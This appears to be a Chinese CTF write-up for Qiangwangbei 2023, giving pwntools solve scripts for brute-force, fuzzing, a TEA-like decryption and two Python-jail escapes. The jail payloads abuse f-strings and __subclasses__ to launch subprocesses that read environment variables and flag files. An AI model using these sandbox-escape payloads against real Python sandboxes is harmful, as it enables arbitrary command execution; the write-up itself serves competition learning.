强网杯2023WP

因为周末太冷了，所以决定随便打打qwb摸摸鱼，太卷了现在的qwb，被暴打

强网先锋

石头剪刀布

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52


from pwn import *

def read_data():
    received_data = io.recvline()
    return received_data.decode('utf-8')

def read_once():
    for i in range(5):
        print(read_data())

def begin(i):
    for n in range(i):
        read_once()

def send_data():
    for n,i in enumerate(data):
        io.sendline(i.encode())
    # io.interactive()

    for i in range(4):
        print(read_data())
        

    begin(len(data))
    
def right():
    io.recvline()
    io.recvline()
    test=io.recvline()
    if "你" in test.decode('utf-8'):
        return True
    else:
        return False

def try_ans(ans):  
    send_data()
    io.sendline(ans.encode())
    if right():
        return ans
    else:
        return
    
data="001122012"
for i in range(90):
    for j in range(3):
        io = remote( '8.147.135.248' ,25407)
        
        ans=try_ans(str(j))
        if ans:
            data+=ans
        io.close()
    print(data)

easy_fuzz

一个简单的fuzz，就是对我们输入的字符串进行匹配，覆盖率的前两位是检查我们的输入是否是9位，随便什么字符都可以。对后面7个字符逐个对比，如果比对正确，覆盖率就为1，不正确覆盖率就为0。fuzz的脚本如下：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27


from pwn import *

p = remote("101.200.122.251",12177)

charset = []
for i in range(32,127):
    charset.append(bytes(chr(i),'utf-8'))

payload = [b'a',b'a',b'a',b'a',b'a',b'a',b'a',b'a',b'a']

def get_string(payload):
    string = b''
    for i in payload:
        string+=i
    return string

for i in range(9):
    for j in charset:
        payload[i]=j
        p.sendline(get_string(payload))
        content = p.recvline().decode('utf-8').strip()
        content2 = p.recvline()
        coverage_bit = content[i-9]
        if coverage_bit == "1":
            print(f"payload:{get_string(payload)} coverage: {content[-9:]}")
            print(content2)
            break

最后得到当字符为 aaqwbGood 时，覆盖率为全1，拿到flag：

qwb{YouKnowHowToFuzz!}

SpeedUp

发现这里有A244060 - OEIS

Babyre

类似于tea的加密模式

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46


#include <stdio.h>

unsigned char byte_7FF7833FE000[8] = {
    0x62,0x6f,0x6d,0x62, 0x00, 0x00, 0x00, 0x00
};

int dec(unsigned  *a1, unsigned *a2)
{
  int result; // rax
  unsigned int v3; // [rsp+44h] [rbp+24h]
  int i; // [rsp+64h] [rbp+44h]
  int j; // [rsp+84h] [rbp+64h]

  result = 2421198151;
  v3 = 2421198151-2009038745*33*4;
  for ( i = 0; i < 4; ++i )
  {
    for ( j = 0; j < 33; ++j )
    {
        v3 += 2009038745;
        *a2 -= (((32 * *a1) ^ (*a1 >> 4)) + *a1) ^ (v3 + byte_7FF7833FE000[(v3 >> 11) & 3]);
      *a1 -= (((32 * *a2) ^ (*a2 >> 4)) + *a2) ^ (v3 + byte_7FF7833FE000[v3 & 3]) ^ v3;
    }
    result = (unsigned int)(i + 1);
  }
  return result;
}

int main(int argc, char const *argv[])
{
    unsigned char byte_7FF7833FE040[32] = {
    0xE0, 0xF3, 0x21, 0x96, 0x97, 0xC7, 0xDE, 0x89, 0x9B, 0xCA, 0x62, 0x8D, 0xB0, 0x5D, 0xFC, 0xD2, 
    0x89, 0x55, 0x1C, 0x42, 0x50, 0xA8, 0x76, 0x9B, 0xEA, 0xB2, 0xC6, 0x2F, 0x7C, 0xCF, 0x11, 0xDE
};
    for (size_t i = 0; i < 32; i++)
    {
        byte_7FF7833FE040[i] ^= i;
    }
    unsigned int *v =(unsigned int *)byte_7FF7833FE040;
    
    dec(v,v+1);
    dec(v+2,v+3);
    dec(v+4,v+5);
    dec(v+6,v+7);
    puts(v);
}

MIsc

Pyjail ! It’s myFILTER

1
2
3
4
5
6
7
8


from pwn import *

io = remote("8.147.133.95", 18270)

io.sendlineafter(b"code to escape >", b"{(my_filter:=len,1)[1]}{{inpu{chr(0x74)}()}}")
io.sendline(b"{print([].__class__.__base__.__subclasses__()[-1](\"env\"))}".strip())

io.interactive()

Pyjail ! It’s myReveng

1
2
3
4
5
6
7


from pwn import *

io = remote("8.147.131.244", 17143)

io.sendlineafter(b"code to escape >", b"{(my_filter:=len,len:=any,1)[2]}{{inpu{chr(0x74)}()}}")
io.sendline(b"{print([].__class__.__base__.__subclasses__()[-1]([\"cat\",\"flag_23A818A72E88A6EE12E8A871F11264F71910B99F5EA05250C145216A8027EFB2\"]).communicate())}".strip())
io.interactive()

Crypto

guess game

盲猜非预期，恩爆破出了

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30


from pwn import *

token = b"icq19cc72e474f97c53e778965b90d14"
round = 0
maxnum=0
win = 0

while True:
    try:
        io = remote("47.97.69.130", 22333)
        round += 1
        io.sendlineafter(b"token:", token)
        io.sendlineafter(b">", b"2")
        
        for i in range(80):
            io.sendlineafter(b">", b"0")
            res = io.recvuntil(b"!")
            if b"Right" in res:
                win += 1
            maxnum=max(win,maxnum)
        print(f"第{round}次尝试, 赢了{win}次,目前最多{maxnum}次")
        if win > 56:
            print("ooooooooooook")
            break
        io.close()
    except EOFError:
        io.close()
        continue

io.interactive()

强网杯2023WP#

强网先锋#

石头剪刀布#

easy_fuzz#

SpeedUp#

Babyre#

MIsc#

Pyjail ! It’s myFILTER#

Pyjail ! It’s myReveng#

Crypto#

guess game#